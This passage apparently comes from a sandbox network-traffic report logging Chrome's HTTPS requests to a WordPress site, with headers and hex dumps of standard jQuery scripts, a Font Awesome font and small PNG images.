                                                                                                          Data Ascii: dataTypes[0])return r=e.jsonpCallback=v(e.jsonpCallback)?e.jsonpCallback():e.jsonpCallback,a?e[a]=e[a].replace(Zt,"$1"+r):!1!==e.jsonp&&(e.url+=(At.test(e.url)?"&":"?")+e.jsonp+"="+r),e.converters["script json"]=function(){return o||ce.error(r+" was not c


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          42192.168.2.2449816147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:14 UTC575OUTGET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:14 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:14 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 05 Jul 2024 00:59:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 13577
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:15 UTC13577INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 33 2e 34 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72
                                                                                                          Data Ascii: /*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){r


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          43192.168.2.2449818147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:16 UTC713OUTGET /wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-brands-400.woff2 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          Origin: https://annavirgili.com
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: font
                                                                                                          Referer: https://annavirgili.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5.15.3
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:16 UTC198INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:16 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 25 Mar 2022 21:30:22 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 76764
                                                                                                          Connection: close
                                                                                                          2024-12-12 11:58:16 UTC16384INData Raw: 77 4f 46 32 00 01 00 00 00 01 2b dc 00 0d 00 00 00 02 0b 94 00 01 2b 80 01 4b 85 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 1e 06 60 00 8b 72 11 08 0a 87 bb 64 85 ed 1c 01 36 02 24 03 8e 30 0b 87 1a 00 04 20 05 8b 05 07 aa 6b 5b c9 9f 71 45 61 f7 01 2a 76 93 aa aa 6d 1e 70 47 bd 91 91 08 dd 0e 22 92 94 39 7a c2 1d f6 38 80 98 9b 3e fb ff ff ff 35 c9 42 c6 76 f7 c3 fb 8d 31 06 00 a8 aa 9a a5 95 05 c9 f0 98 8c 36 c7 cc 1d 15 47 5f 52 41 a2 8e ea 50 d3 38 d5 61 ec 32 72 9b 67 b4 95 93 1a 58 ac 75 f3 64 8a f7 34 3b fb 4c 4e c3 b0 1d 3c 05 e4 20 47 56 a4 a3 71 22 19 22 19 22 19 a2 92 ce 98 bd 81 0d 17 8c a7 74 a5 9b 21 12 5f 9d aa 21 8a c8 e4 34 bb 90 ed 3d 6a c8 3d 62 3f 71 a4 6c 68 67 da 75 80 07 1c 49 e1 45 cd f5 e1
                                                                                                          Data Ascii: wOF2++K?FFTM`rd6$0 k[qEa*vmpG"9z8>5Bv16G_RAP8a2rgXud4;LN< GVq"""t!_!4=j=b?qlhguIE
                                                                                                          2024-12-12 11:58:16 UTC16384INData Raw: 03 8c 4c 64 49 68 77 f0 88 7b 9a 5f 8d c2 e2 af 12 93 98 72 f4 59 c7 3a d0 0b da f4 aa 3c a0 e8 f1 32 37 af 72 fe a4 61 ca 68 57 29 76 25 16 8f 1d 5c f7 1d ab b6 bf 9e 1c c3 60 75 2b ba 59 a4 39 7f db cf a0 3f 44 94 cb 93 fa 16 b4 8d 9c 4d 62 44 ce 79 d9 78 01 60 ac 25 f2 15 1c 40 08 fa 27 0f 67 f0 2c 10 d8 2a 51 66 71 f5 ca 0a 52 84 84 14 4c 26 4d 2c 10 dc ed d4 f1 4e c9 42 05 89 01 0f c5 17 cd e2 a8 35 87 41 4a cc 63 42 1b 92 39 bf fa a8 2a 00 1c d8 40 9b 04 7a b7 60 d4 46 e8 b6 22 3f 7e ff 2a f4 de bf b0 7e 19 10 e3 d6 da 84 48 e6 f8 21 18 c7 40 04 95 cf 27 e6 72 36 db fb bd db f2 bd d6 ed b5 34 72 e4 b0 c8 e3 f7 91 d2 99 d1 03 b0 58 32 15 6b a4 ed 1c 4e 4b 54 ba 46 84 a8 72 a0 ed 34 d3 cd a3 a0 2f c4 6a 3b bf 7b 08 44 09 a3 4e 3a 33 0a b8 64 54 8f 77
                                                                                                          Data Ascii: LdIhw{_rY:<27rahW)v%\`u+Y9?DMbDyx`%@'g,*QfqRL&M,NB5AJcB9*@z`F"?~*~H!@'r64rX2kNKTFr4/j;{DN:3dTw
                                                                                                          2024-12-12 11:58:16 UTC16384INData Raw: c8 58 08 0e 67 a9 78 93 ea 0d 9e 26 2f 8c 33 4b 12 e4 33 ca e5 18 d5 6a 2e fb d7 fa fd ae ee 1b 6c 1b 10 09 4a 8d 0c aa ef 89 48 f5 05 a5 b6 c4 ea ea 65 22 24 c6 e8 14 f7 7d 14 26 73 a1 cd aa 50 26 c5 54 19 aa 50 21 00 05 c0 cd 07 82 fc 2c cf ac 16 af df 46 ed f5 59 43 14 fa 84 38 8a b8 4c 3a 3b cb 33 dd 1d da 7d 4f 24 39 5e 3a 4b 0c f6 f6 b9 48 01 d1 43 23 10 5e 2a e8 d8 30 eb 67 7e 0d 9f 4f aa 2b 3d db b6 af 2d 20 40 37 d2 cc 61 dd 97 92 36 2c f5 f5 48 ed 74 d2 be 65 71 9a aa 22 9a a4 6d 12 c2 a3 36 3f fd 6a a2 b6 52 2a dc f0 ec a5 b3 9f f3 f7 67 0b 0b 92 84 50 a8 5c c0 39 44 bb f9 b3 ef 67 b2 22 84 91 17 cc b0 9b 40 2a 5e 39 0d e1 a1 b1 e7 c1 b2 76 c9 f4 c5 2a fe 56 25 e3 6b 3e e1 1b d7 67 c5 65 69 7c 91 13 72 b9 50 9b 8c b8 a7 d5 0f 3c 1c 89 a8 7e 98
                                                                                                          Data Ascii: Xgx&/3K3j.lJHe"$}&sP&TP!,FYC8L:;3}O$9^:KHC#^*0g~O+=- @7a6,Hteq"m6?jR*gP\9Dg"@*^9v*V%k>gei|rP<~
                                                                                                          2024-12-12 11:58:17 UTC16384INData Raw: 53 52 48 bd 7a 24 1f 4a 1a 3b 15 84 85 2c 87 91 c2 e0 94 02 99 8b 40 81 06 11 1e c0 57 e8 84 79 10 ee f3 48 99 15 66 29 a5 75 08 aa 68 2c d3 20 c8 94 af 30 f5 48 ee c2 12 9b 56 b8 c0 11 35 fc 11 76 63 28 f3 69 ff c1 10 6d 25 8d f4 d8 d0 24 c6 64 0b b2 87 42 4d 4e c4 17 5e b1 2c 2f dc e0 ed ec f2 28 77 66 f5 27 27 6d cc 7c 10 99 c0 12 c7 f0 6b 12 26 56 d1 29 d9 4d 93 53 87 ec a5 93 df 62 69 d8 49 91 fd c0 1c 5c 88 50 7c 8e 52 8d 09 87 68 b0 1a 4d b1 64 2c 61 74 7f 1c 1f 0b 96 9c eb 40 c4 0d e5 fb 9a 48 47 2c 7f cf 1e 7e ac 23 b2 e6 bd 12 e8 73 de 57 aa 1f a8 2b df f7 c6 49 ae ef 93 fd bf cd cf 61 54 4d 9a 9f 16 b9 2c 28 ad 75 f2 4e 31 3b 8c a4 ab 5f 77 cd 51 4e bf 05 62 55 ef 9b 81 26 8a ac 69 58 b6 a6 0e 3e af 75 db 50 83 dd c1 06 0d 39 7a d5 70 10 21 94
                                                                                                          Data Ascii: SRHz$J;,@WyHf)uh, 0HV5vc(im%$dBMN^,/(wf''m|k&V)MSbiI\P|RhMd,at@HG,~#sW+IaTM,(uN1;_wQNbU&iX>uP9zp!
                                                                                                          2024-12-12 11:58:17 UTC11228INData Raw: 84 50 ae 3e 99 92 34 46 69 d0 72 fc f8 d0 33 99 9d a9 f1 d7 f8 b7 3f 77 19 d2 59 5a bf 3b 99 31 1d dd c3 48 ab fd d4 61 e5 84 48 3a 90 dc 73 85 28 e3 e4 8b 1d 52 28 f1 ec 57 83 a2 fc e6 3e de 5d 0a 0a 09 de 9f 3e db 63 b4 a3 47 87 de 9c a0 0b b2 35 37 d2 e0 a6 ee e2 39 a5 0a b9 b2 4a 81 31 5c 73 13 cf b1 97 eb 6d 1b da 0a db 0a be 6d 14 a1 47 8e 43 5f a0 1f df 01 7a 00 72 26 37 22 e4 14 06 31 c1 73 f2 8e 15 97 28 56 0c 12 47 06 08 55 f0 b0 20 c6 18 a8 8a e5 b8 1c 41 28 78 62 c1 fe c7 a4 1f 10 46 a8 82 52 d5 75 16 02 13 56 22 1c 57 8b 31 12 01 f0 53 e9 e5 19 15 90 c0 c8 ef 15 1b 81 be f8 9a e1 05 c0 1a 00 ed 08 8c b9 a5 ae 69 df 90 86 fc 96 f4 8a fc fc cc ea 40 14 40 c8 aa 9e 51 40 0c 8c 6d a0 02 60 ba f3 20 00 22 2b 10 84 50 74 5f 8a e9 6d e3 78 f3 e8 67
                                                                                                          Data Ascii: P>4Fir3?wYZ;1HaH:s(R(W>]>cG579J1\smmGC_zr&7"1s(VGU A(xbFRuV"W1Si@@Q@m` "+Pt_mxg


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          44192.168.2.2449817147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:16 UTC641OUTGET /wp-content/plugins/revslider/public/assets/assets/dummy.png HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: image
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:16 UTC243INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:16 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 10 Aug 2021 13:55:53 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 68
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: image/png
                                                                                                          2024-12-12 11:58:16 UTC68INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 08 04 00 00 00 b5 1c 0c 02 00 00 00 0b 49 44 41 54 18 57 63 60 60 00 00 00 03 00 01 68 26 59 0d 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                          Data Ascii: PNGIHDRIDATWc``h&YIENDB`


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          45192.168.2.2449819147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:16 UTC398OUTGET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:17 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:17 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 05 Jul 2024 00:59:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 13577
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:17 UTC13577INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 33 2e 34 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72
                                                                                                          Data Ascii: /*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){r


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          46192.168.2.2449820147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:16 UTC390OUTGET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:17 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:17 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 05 Jul 2024 00:59:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 87553
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:17 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                          Data Ascii: /*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                          2024-12-12 11:58:17 UTC16384INData Raw: 5d 7d 29 2c 6c 61 73 74 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 5b 74 2d 31 5d 7d 29 2c 65 71 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 5b 6e 3c 30 3f 6e 2b 74 3a 6e 5d 7d 29 2c 65 76 65 6e 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 74 3b 6e 2b 3d 32 29 65 2e 70 75 73 68 28 6e 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 6f 64 64 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 31 3b 6e 3c 74 3b 6e 2b 3d 32 29 65 2e 70 75 73 68 28 6e 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 6c 74 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 66 6f 72 28 72 3d 6e 3c 30 3f 6e 2b 74 3a 74 3c 6e 3f 74 3a 6e 3b 30
                                                                                                          Data Ascii: ]}),last:X(function(e,t){return[t-1]}),eq:X(function(e,t,n){return[n<0?n+t:n]}),even:X(function(e,t){for(var n=0;n<t;n+=2)e.push(n);return e}),odd:X(function(e,t){for(var n=1;n<t;n+=2)e.push(n);return e}),lt:X(function(e,t,n){var r;for(r=n<0?n+t:t<n?t:n;0
                                                                                                          2024-12-12 11:58:17 UTC16384INData Raw: 74 68 69 73 2c 74 2c 6e 29 3b 63 65 2e 5f 71 75 65 75 65 48 6f 6f 6b 73 28 74 68 69 73 2c 74 29 2c 22 66 78 22 3d 3d 3d 74 26 26 22 69 6e 70 72 6f 67 72 65 73 73 22 21 3d 3d 65 5b 30 5d 26 26 63 65 2e 64 65 71 75 65 75 65 28 74 68 69 73 2c 74 29 7d 29 7d 2c 64 65 71 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 65 2e 64 65 71 75 65 75 65 28 74 68 69 73 2c 65 29 7d 29 7d 2c 63 6c 65 61 72 51 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 71 75 65 75 65 28 65 7c 7c 22 66 78 22 2c 5b 5d 29 7d 2c 70 72 6f 6d 69 73 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 31 2c 69 3d 63 65 2e 44 65 66 65 72 72 65 64
                                                                                                          Data Ascii: this,t,n);ce._queueHooks(this,t),"fx"===t&&"inprogress"!==e[0]&&ce.dequeue(this,t)})},dequeue:function(e){return this.each(function(){ce.dequeue(this,e)})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(e,t){var n,r=1,i=ce.Deferred
                                                                                                          2024-12-12 11:58:17 UTC16384INData Raw: 29 7b 63 65 2e 66 6e 5b 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 5b 5d 2c 72 3d 63 65 28 65 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 2d 31 2c 6f 3d 30 3b 6f 3c 3d 69 3b 6f 2b 2b 29 74 3d 6f 3d 3d 3d 69 3f 74 68 69 73 3a 74 68 69 73 2e 63 6c 6f 6e 65 28 21 30 29 2c 63 65 28 72 5b 6f 5d 29 5b 61 5d 28 74 29 2c 73 2e 61 70 70 6c 79 28 6e 2c 74 2e 67 65 74 28 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 6e 29 7d 7d 29 3b 76 61 72 20 5f 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 47 2b 22 29 28 3f 21 70 78 29 5b 61 2d 7a 25 5d 2b 24 22 2c 22 69 22 29 2c 7a 65 3d 2f 5e 2d 2d 2f 2c 58 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74
                                                                                                          Data Ascii: ){ce.fn[e]=function(e){for(var t,n=[],r=ce(e),i=r.length-1,o=0;o<=i;o++)t=o===i?this:this.clone(!0),ce(r[o])[a](t),s.apply(n,t.get());return this.pushStack(n)}});var _e=new RegExp("^("+G+")(?!px)[a-z%]+$","i"),ze=/^--/,Xe=function(e){var t=e.ownerDocument
                                                                                                          2024-12-12 11:58:17 UTC16384INData Raw: 6f 70 46 69 78 3a 7b 22 66 6f 72 22 3a 22 68 74 6d 6c 46 6f 72 22 2c 22 63 6c 61 73 73 22 3a 22 63 6c 61 73 73 4e 61 6d 65 22 7d 7d 29 2c 6c 65 2e 6f 70 74 53 65 6c 65 63 74 65 64 7c 7c 28 63 65 2e 70 72 6f 70 48 6f 6f 6b 73 2e 73 65 6c 65 63 74 65 64 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 74 26 26 28 74 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74
                                                                                                          Data Ascii: opFix:{"for":"htmlFor","class":"className"}}),le.optSelected||(ce.propHooks.selected={get:function(e){var t=e.parentNode;return t&&t.parentNode&&t.parentNode.selectedIndex,null},set:function(e){var t=e.parentNode;t&&(t.selectedIndex,t.parentNode&&t.parent
                                                                                                          2024-12-12 11:58:17 UTC5633INData Raw: 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 72 3d 65 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 3d 76 28 65 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 29 3f 65 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 28 29 3a 65 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 2c 61 3f 65 5b 61 5d 3d 65 5b 61 5d 2e 72 65 70 6c 61 63 65 28 5a 74 2c 22 24 31 22 2b 72 29 3a 21 31 21 3d 3d 65 2e 6a 73 6f 6e 70 26 26 28 65 2e 75 72 6c 2b 3d 28 41 74 2e 74 65 73 74 28 65 2e 75 72 6c 29 3f 22 26 22 3a 22 3f 22 29 2b 65 2e 6a 73 6f 6e 70 2b 22 3d 22 2b 72 29 2c 65 2e 63 6f 6e 76 65 72 74 65 72 73 5b 22 73 63 72 69 70 74 20 6a 73 6f 6e 22 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7c 7c 63 65 2e 65 72 72 6f 72 28 72 2b 22 20 77 61 73 20 6e 6f 74 20 63
                                                                                                          Data Ascii: dataTypes[0])return r=e.jsonpCallback=v(e.jsonpCallback)?e.jsonpCallback():e.jsonpCallback,a?e[a]=e[a].replace(Zt,"$1"+r):!1!==e.jsonp&&(e.url+=(At.test(e.url)?"&":"?")+e.jsonp+"="+r),e.converters["script json"]=function(){return o||ce.error(r+" was not c


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          47192.168.2.2449823147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:16 UTC627OUTGET /wp-content/plugins/gtranslate/flags/16/it.png HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: image
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:17 UTC244INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:17 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 10 May 2024 09:01:28 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 440
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: image/png
